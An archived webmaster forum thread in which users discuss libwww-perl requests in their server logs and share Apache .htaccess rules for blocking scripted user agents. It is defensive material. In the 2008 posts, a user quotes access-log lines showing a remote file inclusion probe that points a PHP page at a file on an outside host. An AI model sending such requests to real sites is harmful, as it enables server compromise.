Forum Moderators: open

Message Too Old, No Replies

libwww-perl/5.53

archive.org

         

react

2:15 pm on Apr 28, 2003 (gmt 0)

10+ Year Member



209.237.232.83 - - [28/Apr/2003:13:15:55 +0100] "GET /robots.txt HTTP/1.0" 200 484 "-" "libwww-perl/5.53"
209.237.232.81 - - [28/Apr/2003:13:16:01 +0100] "GET /robots.txt HTTP/1.0" 200 484 "-" "libwww-perl/5.53"
209.237.232.84 - - [28/Apr/2003:13:16:05 +0100] "GET /robots.txt HTTP/1.0" 200 484 "-" "libwww-perl/5.53"
209.237.232.80 - - [28/Apr/2003:13:16:06 +0100] "GET /robots.txt HTTP/1.0" 200 484 "-" "libwww-perl/5.53"

I did a tracert to archive.org but I thought they used a different UA? I also have had a lot more requests from these ip(s)!

jdMorgan

2:55 pm on Apr 28, 2003 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



react,

IA uses libwww to check to see if they're allowed to display your graphics as I recall. So, they're probably grabbing your robots.txt to see if you've Disallowed your graphics or the subdirectories your graphics reside in.

I generally block libwww-perl accesses, but I allow AltaVista, Inktomi, and IA Archiver to use it to access my sites because they use it legitimately.

Similarly, I block Java and Python URLlib, but allow Google to use them because several of the Google Labs tools use those User-agents.

My main concern is e-mail scrapers and site downloaders, just due to the wasted bandwidth, but I have no problem with legitimate users of these sometimes-too-powerful utilities.


# Block libwww-perl except from AltaVista, Inktomi, and IA Archiver
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9] [NC]
RewriteCond %{REMOTE_ADDR}!^209\.73\.(1[6-8][0-9]¦19[01])\.
RewriteCond %{REMOTE_ADDR}!^209\.131\.(3[2-9]¦[45][0-9]¦6[0-3])\.
RewriteCond %{REMOTE_ADDR}!^209\.237\.23[2-5]\.
RewriteRule !^403.*\.html$ - [F]
#
# Block Java and Python URLlib except from Google
RewriteCond %{HTTP_USER_AGENT} ^(Python.urllib¦Java/?[1-9]\.[0-9]) [NC]
RewriteCond %{REMOTE_ADDR}!^216\.239\.(3[2-9]¦[45][0-9]¦6[0-3])\.
RewriteRule !^403.*\.html$ - [F]

Note that any User-agent is allowed to access my custom 403 pages - it's only fair... :)

HTH,
Jim

react

3:21 pm on Apr 28, 2003 (gmt 0)

10+ Year Member



Thanks very much Jim, you have put my mind at rest :)

cyberdyne

12:00 pm on Mar 15, 2008 (gmt 0)

10+ Year Member



Hope nobody minds me opening up an old thread, but I need a little advice on libwww-perl if possible please.

I found these two entries in my logs, I think, indicating successful hits upon libww-perl requests.

copper.webfusion.co.uk - - [15/Mar/2008:03:38:35 +0000] "GET //index2.php=http://www.pressurekru.co.uk/images/profile/jpg.txt? HTTP/1.1" 200 666 "-" "libwww-perl/5.68"
dublin.clusterspan.net - - [15/Mar/2008:03:41:03 +0000] "GET //index2.php=http://www.pressurekru.co.uk/images/profile/jpg.txt? HTTP/1.1" 200 665 "-" "libwww-perl/5.805"

Am I correct in assuming the above two hits were not blocked despite having the following lines in my .htaccess file?

RewriteEngine On
#
#
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(python[-.]?urllib¦java/?[1-9]\.[0-9]) [NC]
#
#
RewriteRule ^.*$ 403.php [L]

Thank you for any advice.

cyberdyne

12:17 pm on Mar 15, 2008 (gmt 0)

10+ Year Member



I have just rewritten my rules to include the code from the top of this page, I am sure some of it is unnecessary but would appreciate any comments.

Thank you.

# Block libwww-perl except from AltaVista, Inktomi, and IA Archiver
#
RewriteEngine On
#.....
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9] [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Python.urllib¦Java/?[1-9]\.[0-9]) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(python[-.]?urllib¦java/?[1-9]\.[0-9]) [NC]
RewriteCond %{REMOTE_ADDR} !^207\.126\.2(2[4-9]¦3[0-9])\.
RewriteCond %{REMOTE_ADDR} !^209\.73\.(1[6-8][0-9]¦19[01])\.
RewriteCond %{REMOTE_ADDR} !^209\.131\.(3[2-9]¦[45][0-9]¦6[0-3])\.
RewriteCond %{REMOTE_ADDR} !^209\.237\.23[2-5]\.
RewriteCond %{REMOTE_ADDR} !^216\.239\.(3[2-9]¦[45][0-9]¦6[0-3])\.
#....
RewriteRule !^403.*\.php$ - [F]

wilderness

7:42 pm on Mar 15, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Am I correct in assuming the above two hits were not blocked despite having the following lines in my .htaccess file?

Best practice is to check your error logs.

The lines have resulted in 200, however, what is the file size of "403.php when somebody access that file?
Compare that file to the 200 file size in these lines, because you are after all redirecting to that page.

RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]

In addition, in order for the above to function?
you either escape the hypen or inlcude the entire phrase (as well as hypen) in quotes.

Don

wilderness

7:48 pm on Mar 15, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9] [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Python.urllib¦Java/?[1-9]\.[0-9]) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(python[-.]?urllib¦java/?[1-9]\.[0-9]) [NC]

You may solve all this with a single line:

RewriteCond %{HTTP_USER_AGENT} (libwww¦perl¦Indy¦python¦urllib¦java) [NC]

Make sure to correct the pipe characters that are broken by the forum.

Don

cyberdyne

3:59 pm on Mar 16, 2008 (gmt 0)

10+ Year Member



Excellent, I'll try that, thank you very much wilderness.

incrediBILL

1:01 am on Mar 17, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



FWIW, I always block libwww-perl no matter who's using it because anyone serious about using a Perl script can identify themselves with one lousy line of code:

$ua->agent("My User Agent");

If they aren't serious enough to add that line why should I take them seriously? ;)

FYI, lazy botnet probes use the default user agent so blocking libwww-perl is a matter of basic site protection.
[webmasterworld.com...]

[edited by: incrediBILL at 1:02 am (utc) on Mar. 17, 2008]

keyplyr

7:32 am on Mar 17, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



FWIW, I always block libwww-perl no matter who's using it because anyone serious about using a Perl script can identify themselves with one lousy line of code:

$ua->agent("My User Agent");

If they aren't serious enough to add that line why should I take them seriously? ;)

FYI, lazy botnet probes use the default user agent so blocking libwww-perl is a matter of basic site protection.
[webmasterworld.com...]
I agree 100% with Bill's assessment.